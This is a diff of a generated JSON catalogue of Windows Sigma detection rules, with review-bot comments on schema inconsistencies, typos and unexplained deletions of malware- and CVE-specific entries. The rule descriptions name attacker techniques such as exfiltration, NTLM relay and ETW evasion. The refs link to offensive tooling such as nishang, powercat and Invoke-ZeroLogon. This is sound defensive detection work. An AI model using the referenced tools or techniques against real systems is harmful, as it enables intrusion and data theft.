+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml"
],
"tags": [
@@ -71816,8 +68744,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet",
"https://twitter.com/kmkz_security/status/1220694202301976576",
+ "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml"
],
"tags": [
@@ -71884,8 +68812,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.exploit-db.com/exploits/37525",
"https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer",
+ "https://www.exploit-db.com/exploits/37525",
"https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml"
],
@@ -72003,8 +68931,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/med0x2e/status/1520402518685200384",
"https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml",
+ "https://twitter.com/med0x2e/status/1520402518685200384",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml"
],
"tags": [
@@ -72025,6 +68953,30 @@
"uuid": "bb76d96b-821c-47cf-944b-7ce377864492",
"value": "Suspicious NTLM Authentication on the Printer Spooler Service"
},
+ {
+ "description": "Detects file download using curl.exe",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_curl_download_susp_file_sharing_domains.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "56454143-524f-49fb-b1c6-3fb8b1ad41fb",
+ "value": "Suspicious File Download From File Sharing Domain Via Curl.EXE"
+ },
{
"description": "Detects the Installation of a Exchange Transport Agent",
"meta": {
@@ -72257,10 +69209,10 @@
"logsource.product": "windows",
"refs": [
"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services",
- "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/",
- "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services",
"https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe",
"https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6",
+ "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/",
+ "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"
],
"tags": [
@@ -72368,11 +69320,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg",
+ "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
"https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml"
],
"tags": [
@@ -72405,8 +69357,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
"https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
"https://abuse.io/lockergoga.txt",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml"
],
@@ -72436,50 +69388,6 @@
"uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6",
"value": "Disable of ETW Trace"
},
- {
- "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.",
- "meta": {
- "author": "Tim Burrell",
- "creation_date": "2020/02/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_gallium_iocs.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_iocs.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.command_and_control",
- "attack.t1212",
- "attack.t1071",
- "attack.g0093"
- ]
- },
- "related": [
- {
- "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "440a56bf-7873-4439-940a-1c8a671073c2",
- "value": "GALLIUM IOCs"
- },
{
"description": "Detects command line parameters or strings often used by crypto miners",
"meta": {
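Review bot: this hunk deletes the `GALLIUM IOCs` cluster entry (uuid `440a56bf-7873-4439-940a-1c8a671073c2`) outright, including its two `related` links, so a UUID that may already be attached to events disappears without a replacement. Across the patch every deleted entry is a malware-, APT- or CVE-specific rule (`proc_creation_win_apt_gallium_iocs.yml`, `proc_creation_win_malware_darkside_ransomware.yml`, `proc_creation_win_malware_fireball.yml`, `proc_creation_win_malware_formbook.yml`, `proc_creation_win_exploit_cve_2021_40444.yml`, ...) and the hunk headers show the new file is roughly 3,000 lines shorter at this point (`-72436` vs `+69388`), which points to a change in which upstream directories the generator reads rather than individual deprecations. State that scope change in the commit message and consider keeping removed entries in a deprecated state rather than dropping them.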
@@ -72594,9 +69502,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
"https://redcanary.com/blog/raspberry-robin/",
"https://github.com/SigmaHQ/sigma/issues/1009",
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml"
],
"tags": [
@@ -72677,40 +69585,27 @@
"value": "PUA - CleanWipe Execution"
},
{
- "description": "Detects DarkSide Ransomware and helpers",
+ "description": "Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/05/14",
- "falsepositive": [
- "Unknown",
- "UAC bypass method used by other malware"
- ],
- "filename": "proc_creation_win_malware_darkside_ransomware.yml",
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_mssql_veaam_susp_child_processes.yml",
"level": "critical",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2",
- "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_darkside_ransomware.yml"
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml"
],
"tags": [
- "attack.execution",
- "attack.t1204"
+ "attack.initial_access",
+ "attack.persistence",
+ "attack.privilege_escalation"
]
},
- "related": [
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c",
- "value": "DarkSide Ransomware Pattern"
+ "uuid": "d55b793d-f847-4eea-b59a-5ab09908ac90",
+ "value": "Suspicious Child Process Of Veeam Dabatase"
},
{
"description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.",
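Review bot: `"falsepositive": "No established falsepositives"` in the added Veeam entry is a bare string where every other entry visible in this patch uses an array (`["Unknown"]`), so a consumer iterating over `meta.falsepositive` will get characters instead of items; the generator should emit an array consistently, even if empty. The new entry also has no technique tag and no `related` block (only three tactic tags), and its `value` `Suspicious Child Process Of Veeam Dabatase` and filename `proc_creation_win_mssql_veaam_susp_child_processes.yml` carry upstream typos (`Dabatase`, `veaam`) that should be fixed in the SigmaHQ rule, since the filename is part of the reference URL. Note that git has paired the deleted `DarkSide Ransomware Pattern` entry with this addition in one hunk; the two are unrelated changes.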
@@ -72799,8 +69694,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/OTRF/detection-hackathon-apt29/issues/6",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml"
],
"tags": [
@@ -72903,8 +69798,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/binderlabs/DirCreate2System",
- "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
"https://www.echotrail.io/insights/search/wermgr.exe",
+ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml"
],
"tags": "No established tags"
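Review bot: the unchanged context line `"tags": "No established tags"` shows the same string-instead-of-array inconsistency for `tags` that this patch introduces for `falsepositive` in the Veeam entry; it is not touched here, but since the generator output is being regenerated anyway, this is the moment to normalize both fields to arrays (an empty array when the rule has none).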
@@ -72912,41 +69807,6 @@
"uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e",
"value": "Suspicious WERMGR Process Patterns"
},
- {
- "description": "Detects Archer malware invocation via rundll32",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_fireball.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/",
- "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_fireball.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d",
- "value": "Fireball Archer Install"
- },
{
"description": "Detects suspicious PowerShell invocation command parameters",
"meta": {
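Review bot: removing the `Fireball Archer Install` entry (uuid `3d4aebe0-6d29-45b2-a8a4-3dfde586a26d`) drops a `related` link to `045d0922-2310-4e60-b5e4-3302302cb3c5`, the same ATT&CK UUID that the `Rhadamanthys Stealer Module Launch Via Rundll32.EXE` entry removed later in this patch points to (both are tagged `attack.t1218.011`); nothing in the hunk says whether the upstream rule was deleted or relocated, and the commit message should.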
@@ -72983,8 +69843,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml"
],
"tags": [
@@ -73196,42 +70056,6 @@
"uuid": "83865853-59aa-449e-9600-74b9d89a6d6e",
"value": "Audio Capture via SoundRecorder"
},
- {
- "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2019/09/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_formbook.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/",
- "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer",
- "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/",
- "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b",
- "value": "Formbook Process Creation"
- },
{
"description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
"meta": {
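Review bot: no rationale is given for dropping `Formbook Process Creation` (uuid `032f5fb3-d959-41a5-9263-4173c802dc2b`); the entry was complete (four refs, tags, a `related` link). If it is gone because the upstream file moved out of `rules/windows/process_creation/`, the `refs` URL that the generator derives from that path is also stale for any consumer still holding the old entry, so a pointer to the new location would help.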
@@ -73279,19 +70103,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://github.com/besimorhino/powercat",
- "https://adsecurity.org/?p=2921",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml"
],
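Review bot: this hunk mixes three genuine additions (`https://github.com/adrecon/ADRecon`, `https://github.com/Kevin-Robertson/Powermad`, `https://github.com/adrecon/AzureADRecon`) into a reorder of twelve existing refs, so the real change is hard to spot; with a stable ordering in the generator the hunk would be three `+` lines. The added refs themselves are consistent with the rule `proc_creation_win_powershell_malicious_cmdlets.yml` they are attached to.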
@@ -73415,8 +70242,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://twitter.com/_st0pp3r_/status/1583914244344799235",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml"
],
@@ -73526,8 +70353,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
"https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml"
],
"tags": [
@@ -73577,8 +70404,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
"https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe",
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml"
],
"tags": [
@@ -73901,9 +70728,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
"https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"
],
"tags": [
@@ -74039,8 +70866,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.echotrail.io/insights/search/ilasm.exe",
"https://lolbas-project.github.io/lolbas/Binaries/Ilasm/",
+ "https://www.echotrail.io/insights/search/ilasm.exe",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"
],
"tags": [
@@ -74073,8 +70900,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1461041276514623491c19-ps",
"https://twitter.com/tccontre18/status/1480950986650832903",
+ "https://twitter.com/mrd0x/status/1461041276514623491c19-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_pattern.yml"
],
"tags": [
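Review bot: the ref `https://twitter.com/mrd0x/status/1461041276514623491c19-ps` is malformed in both the removed and the re-added line: a tweet status ID is purely numeric and the trailing `c19-ps` looks like paste residue, so the link will not resolve. This patch only moves the line, but the fix belongs in the upstream `proc_creation_win_regsvr32_http_pattern.yml` rule so it does not get regenerated.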
@@ -74215,8 +71042,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ShadowChasing1/status/1552595370961944576",
"https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior",
+ "https://twitter.com/ShadowChasing1/status/1552595370961944576",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml"
],
"tags": [
@@ -74283,8 +71110,8 @@
"logsource.product": "windows",
"refs": [
"https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"
],
"tags": [
@@ -74386,41 +71213,6 @@
"uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183",
"value": "Port Forwarding Attempt Via SSH"
},
- {
- "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations",
- "meta": {
- "author": "Florian Roth (Nextron Systems), @neonprimetime",
- "creation_date": "2021/09/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_40444.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.joesandbox.com/analysis/476188/1/iochtml",
- "https://twitter.com/neonprimetime/status/1435584010202255375",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_40444.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "894397c6-da03-425c-a589-3d09e7d1f750",
- "value": "Potential CVE-2021-40444 Exploitation Attempt"
- },
{
"description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example",
"meta": {
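Review bot: deleting `Potential CVE-2021-40444 Exploitation Attempt` (uuid `894397c6-da03-425c-a589-3d09e7d1f750`) is one of two CVE-specific removals in this patch (the other is `Exploiting SetupComplete.cmd CVE-2019-1378`); exploit-specific detections are exactly what consumers pin by UUID, and the entry's refs (MSRC update guide, sandbox report) are still valid. If the upstream rule moved, the generator should follow it rather than drop the entry.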
@@ -74435,9 +71227,9 @@
"logsource.product": "windows",
"refs": [
"https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
"https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml"
],
"tags": [
@@ -74547,6 +71339,41 @@
"uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba",
"value": "Net WebClient Casing Anomalies"
},
+ {
+ "description": "Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start a instance with custom extensions",
+ "meta": {
+ "author": "Aedan Russell, frack113, X__Junior (Nextron Systems)",
+ "creation_date": "2022/06/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_browsers_chromium_susp_load_extension.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.mandiant.com/resources/blog/lnk-between-browsers",
+ "https://redcanary.com/blog/chromeloader/",
+ "https://emkc.org/s/RJjuLa",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1176"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e",
+ "value": "Suspicious Chromium Browser Instance Executed With Custom Extensions"
+ },
{
"description": "Detects suspicious process run from unusual locations",
"meta": {
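Review bot: the added `Suspicious Chromium Browser Instance Executed With Custom Extensions` entry is the shape the other additions in this patch should follow: a technique tag `attack.t1176`, a `related` entry with a `dest-uuid`, and an array-valued `falsepositive`. Two small points for upstream: the description reads `a instance` (should be `an instance`), and `https://emkc.org/s/RJjuLa` is a short link to a paste, a fragile reference next to the mandiant and redcanary posts beside it.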
@@ -74594,9 +71421,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
"https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/",
"https://github.com/jpillora/chisel/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml"
],
"tags": [
@@ -74665,9 +71492,9 @@
"refs": [
"https://twitter.com/bohops/status/980659399495741441",
